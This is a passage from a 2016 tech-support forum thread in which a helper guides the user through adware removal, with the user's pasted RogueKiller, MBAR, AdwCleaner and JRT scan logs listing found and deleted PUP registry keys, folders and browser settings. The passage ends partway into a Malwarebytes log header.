File user open failed: C:\WINDOWS\SYSTEM32\drivers\sptd.sys (0x00000020)
Done!
Drive 0
This is a System drive
Scanning MBR on drive 0...
Inspecting partition table:
MBR Signature: 55AA
Disk Signature: 1BC070FA

Partition information:

    Partition 0 type is Primary (0x7)
    Partition is ACTIVE.
    Partition starts at LBA: 2048  Numsec = 204800
    Partition is bootable
    Partition file system is NTFS

    Partition 1 type is Primary (0x7)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 206848  Numsec = 976560272
    Partition is not bootable
    Partition file system is NTFS

    Partition 2 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0  Numsec = 0
    Partition is not bootable

    Partition 3 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0  Numsec = 0
    Partition is not bootable

Disk Size: 500107862016 bytes
Sector size: 512 bytes

Done!
Physical Sector Size: 512
Drive: 1, DevicePointer: 0xfffffa80048ce620, DeviceName: \Device\Harddisk1\DR1\, DriverName: \Driver\Disk\
--------- Disk Stack ------
DevicePointer: 0xfffffa800490f040, DeviceName: Unknown, DriverName: \Driver\partmgr\
DevicePointer: 0xfffffa80048ce620, DeviceName: \Device\Harddisk1\DR1\, DriverName: \Driver\Disk\
DevicePointer: 0xfffffa80046a4520, DeviceName: Unknown, DriverName: \Driver\ACPI\
DevicePointer: 0xfffffa80046a7060, DeviceName: \Device\Ide\IdeDeviceP1T0L0-1\, DriverName: \Driver\atapi\
------------ End ----------
Alternate DeviceName: \Device\Harddisk1\DR1\, DriverName: \Driver\Disk\
Upper DeviceData: 0xfffff8a0154850e0, 0xfffffa80048ce620, 0xfffffa800489d790
Lower DeviceData: 0xfffff8a0121cce00, 0xfffffa80046a7060, 0xfffffa8006e63a50
Drive 1
Scanning MBR on drive 1...
Inspecting partition table:
This drive is a GPT Drive.
MBR Signature: 55AA
Disk Signature: 84AEB39B

GPT Protective MBR Partition information:

    Partition 0 type is EFI-GPT (0xee)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 1  Numsec = 4294967295

    Partition 1 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0  Numsec = 0

    Partition 2 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0  Numsec = 0

    Partition 3 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0  Numsec = 0

GPT Partition information:

    GPT Header Signature 4546492050415254
    GPT Header Revision 65536 Size 92 CRC 675767371
    GPT Header CurrentLba = 1 BackupLba 1953525167
    GPT Header FirstUsableLba 34  LastUsableLba 1953525134
    GPT Header Guid a3bb2c78-e8d1-47eb-8b1-27be344f751f
    GPT Header Contains 128 partition entries starting at LBA 2
    GPT Header Partition entry size = 128

    Backup GPT header Signature 4546492050415254
    Backup GPT header Revision 65536 Size 92 CRC 675767371
    Backup GPT header CurrentLba = 1953525167 BackupLba 1
    Backup GPT header FirstUsableLba 34  LastUsableLba 1953525134
    Backup GPT header Guid a3bb2c78-e8d1-47eb-8b1-27be344f751f
    Backup GPT header Contains 128 partition entries starting at LBA 1953525135
    Backup GPT header Partition entry size = 128

    Partition 0 Type ebd0a0a2-b9e5-4433-87c0-68b6b72699c7
    Partition ID 1711e3e0-22c7-fdc2-6787-03bbc7fe42
    FirstLBA 40  Last LBA 1953525133
    Attributes 0
    Partition Name                                     

Disk Size: 1000204886016 bytes
Sector size: 512 bytes

Done!
Physical Sector Size: 0
Drive: 2, DevicePointer: 0xfffffa8006248790, DeviceName: \Device\Harddisk2\DR2\, DriverName: \Driver\Disk\
--------- Disk Stack ------
DevicePointer: 0xfffffa8004e7d040, DeviceName: Unknown, DriverName: \Driver\partmgr\
DevicePointer: 0xfffffa8006248790, DeviceName: \Device\Harddisk2\DR2\, DriverName: \Driver\Disk\
DevicePointer: 0xfffffa8004e876f0, DeviceName: \Device\0000008a\, DriverName: \Driver\USBSTOR\
------------ End ----------
Physical Sector Size: 0
Drive: 3, DevicePointer: 0xfffffa800638b060, DeviceName: \Device\Harddisk3\DR3\, DriverName: \Driver\Disk\
--------- Disk Stack ------
DevicePointer: 0xfffffa800638bb90, DeviceName: Unknown, DriverName: \Driver\partmgr\
DevicePointer: 0xfffffa800638b060, DeviceName: \Device\Harddisk3\DR3\, DriverName: \Driver\Disk\
DevicePointer: 0xfffffa80063801f0, DeviceName: \Device\000000aa\, DriverName: \Driver\USBSTOR\
------------ End ----------
File "C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-72E9D22B0E2BB7AB3D9F12899FFFF8F1FA873CE3.bin.79" is compressed (flags = 1)
File "C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-72E9D22B0E2BB7AB3D9F12899FFFF8F1FA873CE3.bin.79" is compressed (flags = 1)
File "C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-72E9D22B0E2BB7AB3D9F12899FFFF8F1FA873CE3.bin.79" is compressed (flags = 1)
File "C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-72E9D22B0E2BB7AB3D9F12899FFFF8F1FA873CE3.bin.79" is compressed (flags = 1)
File "C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-72E9D22B0E2BB7AB3D9F12899FFFF8F1FA873CE3.bin.79" is compressed (flags = 1)
File "C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-72E9D22B0E2BB7AB3D9F12899FFFF8F1FA873CE3.bin.79" is compressed (flags = 1)
File "C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-72E9D22B0E2BB7AB3D9F12899FFFF8F1FA873CE3.bin.79" is compressed (flags = 1)
File "C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-72E9D22B0E2BB7AB3D9F12899FFFF8F1FA873CE3.bin.79" is compressed (flags = 1)
File "C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-72E9D22B0E2BB7AB3D9F12899FFFF8F1FA873CE3.bin.79" is compressed (flags = 1)
File "C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-72E9D22B0E2BB7AB3D9F12899FFFF8F1FA873CE3.bin.79" is compressed (flags = 1)
File "C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-72E9D22B0E2BB7AB3D9F12899FFFF8F1FA873CE3.bin.79" is compressed (flags = 1)
File "C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-72E9D22B0E2BB7AB3D9F12899FFFF8F1FA873CE3.bin.79" is compressed (flags = 1)
File "C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-72E9D22B0E2BB7AB3D9F12899FFFF8F1FA873CE3.bin.79" is compressed (flags = 1)
File "C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-72E9D22B0E2BB7AB3D9F12899FFFF8F1FA873CE3.bin.7C" is compressed (flags = 1)
File "C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-72E9D22B0E2BB7AB3D9F12899FFFF8F1FA873CE3.bin.83" is compressed (flags = 1)
Scan finished
=======================================


Removal queue found; removal started
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-0-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\VBR-0-0-2048-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\VBR-0-1-206848-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-0-r.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-1-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-1-r.mbam...
Removal finished

------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

 

RogueKiller V12.7.3.0 (x64) [Oct 17 2016] (Free) by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : http://forum.adlice.com
Website : http://www.adlice.com/download/roguekiller/
Blog : http://www.adlice.com

Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits version
Started in : Normal mode
User : Kevin [Administrator]
Started from : C:\Users\Kevin\Desktop\virusfix\RogueKillerX64.exe
Mode : Scan -- Date : 10/23/2016 02:20:19 (Duration : 00:21:06)

¤¤¤ Processes : 0 ¤¤¤

¤¤¤ Registry : 69 ¤¤¤
[PUP] (X64) HKEY_CLASSES_ROOT\CLSID\{1A53AD8B-D0B9-4E7F-88E4-50C07A65F2DC} (C:\Windows\COUPON~2.OCX) -> Found
[PUP] (X64) HKEY_CLASSES_ROOT\CLSID\{A85A5E6A-DE2C-4F4E-99DC-F469DF5A0EEC} (C:\Windows\COUPON~2.OCX) -> Found
[PUP] (X64) HKEY_CLASSES_ROOT\dnUpdate -> Found
[PUP] (X86) HKEY_LOCAL_MACHINE\Software\W3i -> Found
[PUP] (X64) HKEY_USERS\S-1-5-21-1764878690-1872824068-2637823629-1001\Software\StartSearch -> Found
[PUP] (X64) HKEY_USERS\S-1-5-21-1764878690-1872824068-2637823629-1001\Software\YahooPartnerToolbar -> Found
[PUP] (X86) HKEY_USERS\S-1-5-21-1764878690-1872824068-2637823629-1001\Software\StartSearch -> Found
[PUP] (X86) HKEY_USERS\S-1-5-21-1764878690-1872824068-2637823629-1001\Software\YahooPartnerToolbar -> Found
[PUP] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\SoftwareUpdUtility -> Found
[PUM.Policies] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System | ConsentPromptBehaviorAdmin : 0  -> Found
[PUM.Policies] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System | ConsentPromptBehaviorAdmin : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_TrackProgs : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowUser : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowControlPanel : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowHelp : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyComputer : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyDocs : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyMusic : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyPics : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowPrinters : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowRecentDocs : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowRun : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowSearch : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowSetProgramAccessAndDefaults : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_TrackProgs : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowUser : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowControlPanel : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowHelp : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyComputer : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyDocs : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyMusic : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyPics : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowPrinters : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowRecentDocs : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowRun : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowSearch : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowSetProgramAccessAndDefaults : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-1764878690-1872824068-2637823629-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowDownloads : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-1764878690-1872824068-2637823629-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowDownloads : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_TrackProgs : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowUser : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowControlPanel : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowHelp : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyComputer : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyDocs : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyMusic : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyPics : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowPrinters : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowRecentDocs : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowRun : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowSearch : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowSetProgramAccessAndDefaults : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_TrackProgs : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowUser : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowControlPanel : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowHelp : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyComputer : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyDocs : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyMusic : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyPics : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowPrinters : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowRecentDocs : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowRun : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowSearch : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowSetProgramAccessAndDefaults : 0  -> Found

¤¤¤ Tasks : 0 ¤¤¤

¤¤¤ Files : 3 ¤¤¤
[PUP][Folder] C:\Users\Kevin\AppData\Roaming\Easeware -> Found
[PUP][Folder] C:\Users\Kevin\AppData\Local\iWin -> Found
[PUP][Folder] C:\Program Files (x86)\Coupons -> Found

¤¤¤ WMI : 0 ¤¤¤

¤¤¤ Hosts File : 0 ¤¤¤

¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤

¤¤¤ Web browsers : 1 ¤¤¤
[PUM.HomePage][FIREFX:Config] 0qifstuh.default : user_pref("browser.startup.homepage", "http://www.gbatemp.net"); -> Found

¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0:  +++++
--- User ---
[MBR] 2ade244ac62fd861cb6a805d70a3cda4
[BSP] 06d6b80dccd3339c8874cd082b67ba42 : Windows Vista/7/8|VT.Unknown MBR Code
Partition table:
0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 100 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 206848 | Size: 476836 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
User = LL1 ... OK
User = LL2 ... OK

+++++ PhysicalDrive1: ST1000DM003-1ER162 ATA Device +++++
--- User ---
[MBR] 0667f27ea431bc9973a1d4bc0357e481
[BSP] 25bce0793791fbbb0b12996278839f5e : Empty MBR Code
Partition table:
0 -  | Offset (sectors): 40 | Size: 953869 MB
User = LL1 ... OK
User = LL2 ... OK

+++++ PhysicalDrive2: HP Photosmart Premi USB Device +++++
Error reading User MBR! ([15] The device is not ready. )
Error reading LL1 MBR! NOT VALID!
Error reading LL2 MBR! ([32] The request is not supported. )

+++++ PhysicalDrive3: Generic- Multi-Card USB Device +++++
Error reading User MBR! ([15] The device is not ready. )
Error reading LL1 MBR! NOT VALID!
Error reading LL2 MBR! ([32] The request is not supported. )



#8 TsVk!


Posted 24 October 2016 - 05:06 PM

Hi jumpman17

 

Looking better.

 

Next...

 

Please uninstall these programs if you did not intentionally install them or do not use them:

  • Coupon Printer for Windows
  • Download Updater (AOL Inc.)

then...

 

Please download AdwCleaner and save to your Desktop.

  • Right click and "Run as Administrator"
  • Click on the Scan button.
  • After the scan has finished, click Clean and ok the reboot
  • When complete, your machine will restart and a log file will appear
  • A copy of all logfiles is saved in the C:\AdwCleaner folder which was created when running the tool.

Please download Junkware Removal Tool to your desktop.

  • Shut down your protection software now to avoid potential conflicts.
  • Right click and "Run as Administrator".
  • The tool will open and start scanning your system.
  • On completion a log will open, note the saved JRT.txt on your desktop to copy into your reply

Please download and install MalwareBytes Anti-Malware.

  • Run the program. 
  • Click Scan Now.
  • If threats are detected, click Remove Selected. If you are prompted to reboot, click Yes.
  • Upon completion of the scan (or after the reboot), click the HISTORY tab.
  • Click Application Logs, followed by the first Scan Log.
  • Click Export, followed by Copy to Clipboard.
  • Paste the log in your next reply.

Please include in your reply

  • ADWCleaner log
  • JRT log
  • MBAM log

TsVk!



#9 jumpman17


Posted 24 October 2016 - 09:29 PM

I've uninstalled the 2 programs and here are the requested logs.

 

# AdwCleaner v6.030 - Logfile created 24/10/2016 at 21:55:31
# Updated on 19/10/2016 by Malwarebytes
# Database : 2016-10-23.2 [Server]
# Operating System : Windows 7 Ultimate Service Pack 1 (X64)
# Username : Kevin - KEVIN-PC
# Running from : C:\Users\Kevin\Desktop\virusfix\AdwCleaner.exe
# Mode: Clean
# Support : hxxps://www.malwarebytes.com/support



***** [ Services ] *****



***** [ Folders ] *****

[-] Folder deleted: C:\Users\Kevin\AppData\Local\iWin
[-] Folder deleted: C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\FoxTab


***** [ Files ] *****



***** [ DLL ] *****



***** [ WMI ] *****



***** [ Shortcuts ] *****



***** [ Scheduled Tasks ] *****



***** [ Registry ] *****

[-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\TsActiveXClient
[#] Key deleted on reboot: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\TsActiveXClient_is1
[-] Key deleted: HKLM\SOFTWARE\Classes\AppID\{3A188115-B81B-48F2-A958-F974C8F3F309}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{78CE34FD-F6D4-4866-B79C-A37268D06A04}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{80904944-C726-4C7D-A452-3FFF2A882095}
[-] Key deleted: HKLM\SOFTWARE\Classes\TypeLib\{2D9B1B31-D034-4738-8F6E-40F0AFCC742C}
[-] Key deleted: HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{7854F00C-DC77-477E-A10E-603F48442D3B}
[-] Key deleted: HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{9522B3FB-7A2B-4646-8AF6-36E7F593073C}
[-] Key deleted: HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{9522B3FB-7A2B-4646-8AF6-36E7F593073C}
[-] Key deleted: HKU\S-1-5-21-1764878690-1872824068-2637823629-1001\Software\StartSearch
[-] Key deleted: HKU\S-1-5-21-1764878690-1872824068-2637823629-1001\Software\YahooPartnerToolbar
[#] Key deleted on reboot: HKCU\Software\StartSearch
[#] Key deleted on reboot: HKCU\Software\YahooPartnerToolbar
[-] Key deleted: HKLM\SOFTWARE\W3I
[#] Key deleted on reboot: [x64] HKCU\Software\StartSearch
[#] Key deleted on reboot: [x64] HKCU\Software\YahooPartnerToolbar
[-] Key deleted: HKLM\SOFTWARE\Classes\AppID\SMBarBroker.EXE
[-] Key deleted: HKLM\SOFTWARE\Google\Chrome\Extensions\pacgpkgadgmibnhpdidcnfafllnmeomc


***** [ Web browsers ] *****

[-] Chrome preferences cleaned: "extensions.wajam.affiliate_id" -  "5927"
[-] Chrome preferences cleaned: "extensions.wajam.firstrun" -  "false"
[-] Chrome preferences cleaned: "extensions.wajam.log_send_info" -  "false"
[-] Chrome preferences cleaned:
[-] Chrome preferences cleaned: "extensions.wajam.no_trace" -  "false"
[-] Chrome preferences cleaned: "extensions.wajam.server_current_mapping_version" -  "0.21087"
[-] Chrome preferences cleaned: "extensions.wajam.trace_log" -  "1372300443672 - processDOMLoad - mappingListJsonString is null, request mapping\n1372300444061 - onFlagInfoReceived - JSON Received: {\"unique_id\":\"78C7C7C85644A3EC0BBCE0DAAF70B809\",\"urls_mapping_version\":\"0.21087\",\"send_debug_info\":false}\n1372300444061 - onFlagInfoReceived - Server mapping version: 0.21087\n1372300444061 - onFlagInfoReceived - No client-side server mapping version, don't update\n1372300444061 - onFlagInfoReceived - Saving server mapping version\n1372300444061 - onFlagInfoReceived - No user current mapping version specified, set to '0'\n1372300444062 - onFlagInfoReceived - Unique ID saved\n"
[-] Chrome preferences cleaned: "extensions.wajam.unique_id" -  "78C7C7C85644A3EC0BBCE0DAAF70B809"
[-] Chrome preferences cleaned: "extensions.wajam.user_current_mapping_version" -  "0"
[-] Chrome preferences cleaned: "extensions.wajam.version" -  "1.26"
[-] [C:\Users\Kevin\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: aol.com
[-] [C:\Users\Kevin\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: ask.com


*************************

:: "Tracing" keys deleted
:: Winsock settings cleared

*************************

C:\AdwCleaner\AdwCleaner[C0].txt - [4033 Bytes] - [24/10/2016 21:55:31]
C:\AdwCleaner\AdwCleaner[S0].txt - [4421 Bytes] - [24/10/2016 21:53:47]

########## EOF - C:\AdwCleaner\AdwCleaner[C0].txt - [4179 Bytes] ##########
 

------------------------------------------------------------------------------------------------------------------------------------------------------------------------

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.0.9 (09.30.2016)
Operating System: Windows 7 Ultimate x64
Ran by Kevin (Administrator) on Mon 10/24/2016 at 22:00:12.02
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




File System: 9

Successfully deleted: C:\Users\Kevin\AppData\Local\cre (Folder)
Successfully deleted: C:\Users\Kevin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2E1GZBEI (Temporary Internet Files Folder)
Successfully deleted: C:\Users\Kevin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NWBTTB0B (Temporary Internet Files Folder)
Successfully deleted: C:\Users\Kevin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PMW5IUZE (Temporary Internet Files Folder)
Successfully deleted: C:\Users\Kevin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\YHWRVAQW (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2E1GZBEI (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NWBTTB0B (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PMW5IUZE (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\YHWRVAQW (Temporary Internet Files Folder)

Deleted the following from C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\prefs.js
user_pref(extensions.wajam.affiliate_id, 5927);



Registry: 1

Successfully deleted: HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Search\\SearchAssistant (Registry Value)




~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Mon 10/24/2016 at 22:03:35.24
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
------------------------------------------------------------------------------------------------------------------------------------------------------------------------

 

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 10/24/2016
Scan Time: 10:06 PM
Logfile:
Administrator: Yes

Version: 2.2.1.1043
Malware Database: v2016.10.25.04
Rootkit Database: v2016.09.26.02
License: Premium
Malware Protection: Enabled
Malicious Website Protection: Disabled
Self-protection: Disabled

